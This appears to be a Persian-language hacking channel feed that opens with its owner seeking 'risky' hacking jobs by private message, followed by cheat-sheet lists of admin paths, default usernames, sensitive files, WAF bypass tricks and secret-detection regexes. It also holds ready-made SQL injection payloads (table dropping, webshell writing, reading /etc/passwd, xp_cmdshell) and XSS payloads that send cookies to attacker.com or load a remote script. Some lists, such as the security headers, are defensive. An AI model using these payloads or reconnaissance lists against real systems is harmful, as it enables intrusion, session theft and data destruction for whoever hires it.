رفقا پروژه ای داشتین پیوی در خدمتم
در ضمن درخاست نمیدونم هک روبیکا، هک تلگرام و... رو نکنین اینا بچه بازی نیستن باید هزار تا پلن بریم مهندسی اجتماعی و اینجور کسشرا لطفاً یک پروژه خوب و ریسک دار بدین❤️ قربونتون
@Net_activenull
در ضمن درخاست نمیدونم هک روبیکا، هک تلگرام و... رو نکنین اینا بچه بازی نیستن باید هزار تا پلن بریم مهندسی اجتماعی و اینجور کسشرا لطفاً یک پروژه خوب و ریسک دار بدین❤️ قربونتون
@Net_activenull
❤11
لیست ۱۵ هدر امنیتی که هر وبسایت باید داشته باشد
اگر سایت دارید، این هدرها را روی سرور خود تنظیم کنید تا امنیت بالاتری داشته باشید.
بهبه
اگر سایت دارید، این هدرها را روی سرور خود تنظیم کنید تا امنیت بالاتری داشته باشید.
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: default-src 'self'
Referrer-Policy: no-referrer
Permissions-Policy: geolocation=(), microphone=()
X-XSS-Protection: 1; mode=block
Cache-Control: no-store
Pragma: no-cache
Access-Control-Allow-Origin: https://example.com
Feature-Policy: camera 'none'
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Set-Cookie: Secure; HttpOnly; SameSite=Strict
بهبه
❤10⚡1
لیست ۱۰ ابزار ضروری برای تست امنیت (همه رایگان)
Nmap – اسکن شبکه و پورت
Burp Suite Community – تست برنامه تحت وب
Wireshark – تحلیل ترافیک شبکه
Nikto – اسکنر آسیبپذیری وب
SQLmap – تست تزریق SQL
Hydra – تست brute-force رمز عبور
Metasploit Framework – تست نفوذ کامل
Gobuster – پیدا کردن مسیرهای مخفی
John the Ripper – کرک پسورد
Aircrack-ng – تست امنیت وایفای
❤10⚡1
لیست ۲۰ اکستنشن فایل حساس که همیشه باید بررسی شوند
.env
.git
.sql
.bak
.zip
.tar.gz
.htaccess
.config
.json
.xml
.yml
.ini
.log
.tmp
.swp
.old
.php~
.key
.pem
.crt
❤10⚡1
لیست ۱۵ پارامتر آسیبپذیر رایج در URL (برای تست XSS و SQLi)
?id=
?page=
?search=
?q=
?query=
?redirect=
?url=
?file=
?path=
?dir=
?cmd=
?action=
?user=
?email=
?token=
❤9⚡1
لیست ۲۵ دایرکتوری پیشفرض دوربینهای مداربسته و روترها
/cgi-bin/
/webcam/
/video/
/live/
/stream/
/onvif/
/axis-cgi/
/ptz/
/admin/
/setup/
/config/
/firmware/
/debug/
/telnet/
/cgi-bin/webproc
/goform/
/cgi-bin/luci
/cgi-bin/login
/security/
/network/
/wireless/
/status/
/log/
/diagnostics/
❤9⚡1
لیست ۲۰ هدر رایج که اطلاعات سرور را لو میدهند
Server: Apache/2.4.41
Server: nginx/1.18.0
Server: Microsoft-IIS/10.0
Server: LiteSpeed
X-Powered-By: PHP/7.4.33
X-Powered-By: ASP.NET
X-Powered-By: Express
X-AspNet-Version: 4.0.30319
X-Runtime: 0.123456
X-Drupal-Cache: HIT
X-Generator: WordPress 6.4.1
X-Varnish: 123456
Via: 1.1 varnish
X-Cache: HIT
X-Amz-Cf-Id: abc123
X-Backend-Server: web01
X-Request-ID: 1234567890
X-Debug-Token: abcdef123456
X-Trace-Id: 1234567890
X-Transaction-ID: abcdef123456
❤9⚡1
لیست ۱۵ خطای رایج که اطلاعات حساس لو میدهند
Warning: mysqli_fetch_array() expects parameter...
Fatal error: Uncaught Exception...
Notice: Undefined index: user in...
Parse error: syntax error, unexpected...
PDOException: SQLSTATE[42000]...
Stack trace: #0 /var/www/html...
ORA-00933: SQL command not properly ended
Microsoft OLE DB Provider for ODBC Drivers
TypeError: Cannot read property...
NullPointerException at com.example...
Debugging info: SELECT * FROM users...
Traceback (most recent call last)...
Warning: pg_connect(): Unable to connect...
MySQL server version for the right syntax...
Path: /home/user/public_html/...
❤9⚡1
لیست ۲۰ کوکی حساس که بعد از لاگین باید Secure باشند
PHPSESSID
JSESSIONID
ASP.NET_SessionId
sessionid
sid
session
token
auth_token
access_token
refresh_token
jwt
csrf_token
XSRF-TOKEN
laravel_session
connect.sid
wordpress_logged_in
woocommerce_cart_hash
remember_me
user_session
api_key
❤9⚡1
لیست ۱۵ مسیر پیشفرض پنلهای مدیریتی معروف
/phpmyadmin/index.php
/admin/login.php
/administrator/index.php
/wp-login.php
/wp-admin/
/user/login
/auth/login
/login.html
/cpanel
/whm
/plesk
/roundcube
/webmail
/zimbra
/manager/html
❤9⚡1
لیست ۲۵ نام کاربری پیشفرض که هنوز خیلیها استفاده میکنند
admin
administrator
root
user
test
guest
info
sysadmin
webmaster
manager
operator
supervisor
support
demo
backup
oracle
postgres
mysql
ftp
deploy
jenkins
git
vagrant
ubuntu
ec2-user
❤10⚡1
لیست ۲۰ پسوند فایل که معمولاً بکاپ یا اطلاعات حساس دارند
backup.zip
backup.tar.gz
db_backup.sql
database.sql.gz
dump.sql
export.sql
website.zip
www.zip
public_html.zip
htdocs.zip
site_backup.tar
backup_2024.zip
config.php.bak
index.php.old
wp-config.php.bak
.env.backup
users.sql
data.csv
export.csv
credentials.txt
❤9⚡1
لیست ۲۰ روش دور زدن فایروال و WAF (برای تست نفوذ)
1. URL Encoding Double: %2527
2. Unicode Encoding: %u0027
3. Hex Encoding: 0x27
4. Base64 Payload
5. Mixed Case: SeLeCt
6. Comment Injection: SEL/**/ECT
7. Null Byte: %00
8. Tab Injection: %09
9. New Line: %0A
10. Carriage Return: %0D
11. Double URL: /%2e%2e/
12. Path Traversal: ../../../
13. Chunked Transfer
14. HTTP Parameter Pollution
15. Content-Type Spoofing
16. User-Agent Bypass
17. Referer Bypass
18. Cookie Injection
19. Host Header Injection
20. Slowloris Attack
❤9⚡1
لیست ۲۵ الگوی Regex برای شناسایی اطلاعات حساس (Data Leakage)
\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}\b (Email)
\b(?:\d[ -]*?){13,16}\b (Credit Card)
\b\d{3}-\d{2}-\d{4}\b (SSN)
\bAKIA[0-9A-Z]{16}\b (AWS Access Key)
\bASIA[0-9A-Z]{16}\b (AWS Temp Key)
AIza[0-9A-Za-z_-]{35} (Google API Key)
sk_live_[0-9a-zA-Z]{24,} (Stripe Secret Key)
ghp_[0-9a-zA-Z]{36} (GitHub Token)
xox[baprs]-[0-9a-zA-Z-]{10,} (Slack Token)
-----BEGIN RSA PRIVATE KEY----- (Private Key)
-----BEGIN OPENSSH PRIVATE KEY----- (SSH Key)
password\s*[:=]\s*\S+ (Password)
secret\s*[:=]\s*\S+ (Secret)
api[_-]?key\s*[:=]\s*\S+ (API Key)
token\s*[:=]\s*\S+ (Token)
Authorization\s*:\s*Bearer\s+\S+ (Bearer Token)
mongodb(\+srv)?://[^\s]+ (MongoDB URL)
postgres://[^\s]+ (PostgreSQL URL)
mysql://[^\s]+ (MySQL URL)
redis://[^\s]+ (Redis URL)
amqp://[^\s]+ (RabbitMQ URL)
ftp://[^\s]+ (FTP URL)
smtp://[^\s]+ (SMTP URL)
BEGIN PGP PRIVATE KEY (PGP Key)
\d{11} (Iran National ID)❤9⚡1
لیست ۲۰ تکنیک پیشرفته SQL Injection
1. UNION SELECT null,null,null--
2. ORDER BY 10--
3. GROUP BY column HAVING 1=1--
4. AND 1=1--
5. AND 1=2--
6. OR 'a'='a'
7. '; DROP TABLE users--
8. ' UNION SELECT table_name FROM information_schema.tables--
9. ' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
10. ' AND SLEEP(5)--
11. ' AND BENCHMARK(10000000,SHA1('test'))--
12. ' INTO OUTFILE '/var/www/shell.php'--
13. ' INTO DUMPFILE '/etc/passwd'--
14. ' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION()))--
15. ' AND UPDATEXML(1,CONCAT(0x7e,USER()),1)--
16. '; EXEC xp_cmdshell 'dir'--
17. ' UNION SELECT LOAD_FILE('/etc/passwd')--
18. ' AND ORD(MID((SELECT password FROM users LIMIT 1),1,1))>100--
19. ' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--
20. ';WAITFOR DELAY '00:00:05'--
❤9⚡1
لیست ۳۰ آدرس IP و رنجهای خصوصی که باید بشناسید
10.0.0.0/8 - Private Network
172.16.0.0/12 - Private Network
192.168.0.0/16 - Private Network
127.0.0.1 - Localhost
0.0.0.0 - All Interfaces
169.254.0.0/16 - Link Local
224.0.0.0/4 - Multicast
255.255.255.255 - Broadcast
::1 - IPv6 Loopback
fe80::/10 - IPv6 Link Local
fc00::/7 - IPv6 Unique Local
192.168.1.1 - Router Default
192.168.0.1 - Router Default
10.0.0.1 - Router Default
10.10.10.1 - Router Default
172.16.0.1 - Router Default
192.168.1.100 - Common Device
192.168.0.100 - Common Device
10.0.0.100 - Common Device
10.10.10.10 - Common Device
172.16.0.100 - Common Device
192.168.1.254 - Common Gateway
192.168.0.254 - Common Gateway
10.0.0.254 - Common Gateway
8.8.8.8 - Google DNS
8.8.4.4 - Google DNS
1.1.1.1 - Cloudflare DNS
9.9.9.9 - Quad9 DNS
208.67.222.222 - OpenDNS
208.67.220.220 - OpenDNS
❤8⚡1
لیست ۲۰ ابزار آنلاین رایگان برای تحلیل و تست امنیت
1. VirusTotal - تحلیل فایل و URL
2. Shodan - موتور جستجوی دستگاهها
3. Censys - شناسایی سرورها
4. Have I Been Pwned - بررسی لو رفتن ایمیل
5. dnsdumpster - نقشه DNS
6. crt.sh - جستجوی گواهینامهها
7. SecurityHeaders - بررسی هدرهای امنیتی
8. SSL Labs - تست SSL/TLS
9. BuiltWith - شناسایی تکنولوژی سایت
10. Wappalyzer - شناسایی پلتفرم
11. URLScan - اسکن URL
12. Any.Run - آنالیز بدافزار
13. Hybrid Analysis - آنالیز فایل
14. AbuseIPDB - بررسی IP بد
15. GreyNoise - تحلیل ترافیک
16. FullHunt - شناسایی سرویسها
17. Criminal IP - جستجوی امنیتی
18. LeakIX - شناسایی نشت اطلاعات
19. Dehashed - جستجوی دیتابیسها
20. BrowserLeaks - تست نشت مرورگر
❤8⚡1
۲۵ تکنیک مهندسی اجتماعی که باید بشناسید (برای آگاهی)
1. Phishing Email
2. Spear Phishing
3. Whaling Attack
4. Vishing (Voice Phishing)
5. Smishing (SMS Phishing)
6. Pretexting
7. Baiting (USB Drop)
8. Tailgating (Piggybacking)
9. Quid Pro Quo
10. Scareware
11. Watering Hole Attack
12. Typosquatting
13. Homograph Attack
14. Clone Phishing
15. CEO Fraud
16. Invoice Scam
17. Tech Support Scam
18. Fake Login Page
19. Social Media Impersonation
20. QR Code Phishing (Quishing)
21. Deepfake Call
22. Job Offer Scam
23. Lottery Scam
24. Romance Scam
25. Emergency Scam
❤8⚡1
لیست ۲۵ آسیبپذیری رایج بر اساس OWASP Top 10
1. Broken Access Control - دسترسی غیرمجاز
2. Cryptographic Failures - شکست رمزنگاری
3. Injection - تزریق کد
4. Insecure Design - طراحی ناامن
5. Security Misconfiguration - پیکربندی نادرست
6. Vulnerable Components - کامپوننت آسیبپذیر
7. Auth Failures - شکست احراز هویت
8. Software Integrity Failures - شکست یکپارچگی
9. Logging Failures - شکست ثبت رویداد
10. SSRF - جعل درخواست سمت سرور
11. XSS - اسکریپت بین سایتی
12. CSRF - جعل درخواست بین سایتی
13. IDOR - ارجاع ناامن به آبجکت
14. LFI - گنجاندن فایل محلی
15. RFI - گنجاندن فایل راه دور
16. RCE - اجرای کد از راه دور
17. XXE - تزریق موجودیت خارجی XML
18. SSTI - تزریق قالب سمت سرور
19. Deserialization - سریالزدایی ناامن
20. Race Condition - شرایط رقابتی
21. Buffer Overflow - سرریز بافر
22. Path Traversal - پیمایش مسیر
23. Clickjacking - ربودن کلیک
24. Host Header Injection - تزریق هدر هاست
25. Cache Poisoning - مسمومیت کش
❤8⚡1
لیست ۲۰ پیلود آماده XSS برای تست (فقط روی سیستم خودتان)
<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<details open ontoggle=alert(1)>
<select onchange=alert(1)>
<iframe src="javascript:alert(1)">
<a href="javascript:alert(1)">click</a>
<div onclick="alert(1)">click</div>
<script>alert(document.cookie)</script>
<img src=x onerror="alert(document.cookie)">
<script>fetch('https://attacker.com?c='+document.cookie)</script>
"><script>window.location='https://attacker.com?c='+document.cookie</script>
<script>document.write('<img src="https://attacker.com?c='+document.cookie+'">')</script>
'';!--"<XSS>=&{()}
<ScRiPt>alert(1)</sCrIpT>
<script src="https://attacker.com/xss.js"></script>
❤9⚡1
لیست ۲۰ مسیر پیشفرض Docker و Kubernetes
/var/run/docker.sock
/api/v1/namespaces
/api/v1/pods
/api/v1/services
/api/v1/secrets
/apis/apps/v1/deployments
/apis/rbac.authorization.k8s.io/v1/clusterroles
/healthz
/metrics
/debug/pprof
/version
/swagger.json
/openapi/v2
/dashboard
/kubernetes-dashboard
/api/v1/configmaps
/api/v1/serviceaccounts
/apis/networking.k8s.io/v1/ingresses
/api/v1/persistentvolumes
/apis/batch/v1/jobs
❤11⚡1